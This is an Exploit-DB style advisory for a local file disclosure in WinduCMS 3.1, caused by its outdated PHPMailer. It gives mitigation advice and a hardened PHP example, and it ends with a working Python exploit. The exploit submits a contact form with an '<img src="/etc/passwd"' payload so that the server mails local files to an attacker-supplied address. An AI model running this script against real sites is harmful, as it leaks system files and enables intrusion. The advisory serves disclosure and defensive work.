Vendor: WinduCMS
Author: Maciek Krupa
CVSS: 7.5 (HIGH)
Vulnerability Type: Local File Disclosure
CWE: 200
Product Name: WinduCMS
Affected Version From: 3.1
Affected Version To: 3.1
Patch Exists: Yes
Related CWE: N/A
CPE: a:windu:winducms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux Debian 9
Published: 2017

WinduCMS <= 3.1 - Local File Disclosure

A local file disclosure vulnerability exists in WinduCMS 3.1 because it ships the outdated PHPMailer 5.2.1 and hands the body of its contact form to PHPMailer as HTML. In PHPMailer versions before 5.2.22 (CVE-2017-5223), msgHTML() rewrites every src= attribute that is not a URL into an embedded attachment read from the local filesystem, so a message body containing `<img src="/etc/passwd"` (no closing `>` is needed, the match only requires the quoted attribute) makes the server read /etc/passwd and attach it to the outgoing mail. Exploitation requires a contact form to be present on the site; in WinduCMS the form is embedded with a template tag such as {{W name=contactForm inputs="name" email="root@localhost"}}, where the name attribute is the form_key value the PoC submits and the email attribute presumably sets the recipient. Whether the attacker actually receives the attached file depends on where that message, or a copy of it, is delivered; the PoC supplies an attacker-controlled address in the form's email field.

Mitigation:

Upgrade to the latest version of WinduCMS and to PHPMailer 5.2.22 or later, which only resolves image references into attachments when the application passes a non-empty base directory to msgHTML(). Independently of the library version, do not pass sender-supplied text to msgHTML(): send contact-form bodies as plain text (isHTML(false)), and if HTML must be accepted, strip or rewrite img/background references before they reach PHPMailer.
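The following is an added example, not code from WinduCMS, PHPMailer or the advisory: the vulnerable call pattern described above next to a hardened replacement, written against the PHPMailer 5.2.x API. The function names, the include path and the field names (name, email, content, mirroring the PoC) are assumptions.

```php
<?php
// Added illustration (not WinduCMS or PHPMailer code). Assumes PHPMailer 5.2.x
// loaded from class.phpmailer.php; $post is the submitted contact form.
require_once 'class.phpmailer.php';

// VULNERABLE: sender-controlled text is passed to msgHTML(). With the default
// empty $basedir, PHPMailer < 5.2.22 turns every src="..." that is not a URL
// into addEmbeddedImage($basedir . $path), i.e. it reads that local file and
// attaches it. A body of '<img src="/etc/passwd"' therefore attaches /etc/passwd.
function sendContactVulnerable(array $post, string $recipient): bool
{
    $mail = new PHPMailer();
    $mail->setFrom($post['email'], $post['name']);
    $mail->addAddress($recipient);
    $mail->Subject = 'Contact form';
    $mail->msgHTML($post['content']);   // <-- local file disclosure
    return $mail->send();
}

// HARDENED: the body is sent as plain text, so PHPMailer never looks for
// image references; the sender address is validated and used only as
// Reply-To, and the envelope sender is fixed. Upgrading to PHPMailer >= 5.2.22
// is still required, because other code paths may call msgHTML().
function sendContactHardened(array $post, string $recipient): bool
{
    $sender = (string)($post['email'] ?? '');
    if (!PHPMailer::validateAddress($sender)) {
        return false;                                   // reject malformed addresses
    }
    $mail = new PHPMailer();
    $mail->setFrom($recipient);                         // fixed, not sender-controlled
    $mail->addReplyTo($sender, strip_tags((string)($post['name'] ?? '')));
    $mail->addAddress($recipient);
    $mail->Subject = 'Contact form';
    $mail->isHTML(false);                               // text/plain: no img resolution
    $mail->Body = strip_tags((string)($post['content'] ?? ''));
    return $mail->send();
}
```

Even on 5.2.22 and later, calling msgHTML() on untrusted HTML with a non-empty $basedir still turns image references into attachments read relative to that directory, so plain text is the safer default for anything a visitor can type.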

Exploit-DB raw data:

#!/usr/bin/env python3
#
# Exploit Title: WinduCMS <= 3.1 - Local File Disclosure
# Date: 2017-12-03
# Exploit Author: Maciek Krupa
# Vendor Homepage: http://windu.org
# Version: 3.1
# Tested on: Linux Debian 9
#
# // Description //
#
# Local File Disclosure vulnerability exists in WinduCMS through a vulnerable PHPMailer version 5.2.1 used here
#
# // PoC //
#
# It requires a contact form present on the website
#
# Example: {{W name=contactForm inputs="name" email="root@localhost"}}
#
# Usage: python3 windu_lfd.py [target_url] [attacker_email] [file_to_read]
# Dependencies: pip install requests requests-toolbelt

import sys

import requests
from requests_toolbelt import MultipartEncoder

print("WinduCMS <= 3.1 Exploit")

# Page hosting the contact form; mn= selects the status message shown after submission.
url = sys.argv[1] if len(sys.argv) > 1 else 'http://localhost/contact_page?mn=contactform.message.negative'
# Address submitted in the form's email field.
email = sys.argv[2] if len(sys.argv) > 2 else 'attacker@example.com'
# Local file to disclose. PHPMailer's msgHTML() only needs the quoted src attribute
# to match, so the tag does not need a closing '>'.
target_file = sys.argv[3] if len(sys.argv) > 3 else '/etc/passwd'
payload = '<img src="%s"' % target_file

form_input = 'name'  # the input declared in the template tag (inputs="name")
# form_key must equal the name= attribute of the contactForm template tag.
fields = {'form_key': 'contactForm', form_input: 'Attacker', 'email': email, 'content': payload}
# Fixed boundary so the request looks like a browser-generated multipart form.
m = MultipartEncoder(fields=fields, boundary='----WebKitFormBoundary1500777958139315')
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0',
           'Content-Type': m.content_type}

print('Sending payload to target...')
r = requests.post(url, data=m.to_string(), headers=headers)
# HTTP 200 only shows the form accepted the POST. The disclosed file arrives as an
# embedded (cid) attachment of the mail PHPMailer sends, so confirm by checking the mailbox.
if r.status_code == 200:
    print('Exploited.')
else:
    print('Unexpected response: HTTP %d' % r.status_code)